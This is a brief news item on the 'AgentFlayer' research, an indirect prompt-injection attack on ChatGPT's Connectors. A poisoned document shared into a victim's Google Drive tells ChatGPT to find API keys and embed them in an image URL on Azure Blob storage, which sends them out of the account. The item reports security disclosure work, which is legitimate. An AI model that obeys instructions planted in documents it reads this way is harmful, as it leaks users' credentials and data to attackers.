A Single Poisoned Document Could Leak ‘Secret’ Data Via ChatGPT
1 min read
Summary
Researchers have demonstrated how a weakness in the ‘Connectors’ function of OpenAI’s ChatGPT could allow sensitive data to be extracted from a Google Drive account.
The attack, which has been dubbed ‘AgentFlayer’, saw security researchers Michael Bargury and Tamir Ishay Sharbat share a poisoned document with a victim’s Google Drive.
Within the document was a malicious prompt containing instructions for ChatGPT to search Google Drive for API keys and attach them to a URL that the prompt provided.
The URL was used to call an image from Microsoft’s Azure Blob cloud storage and could potentially be used to exfiltrate other data from the victim’s drive.
OpenAI introduced ‘Connectors’ as a beta function this year, allowing users to link up to 17 different services to their ChatGPT accounts.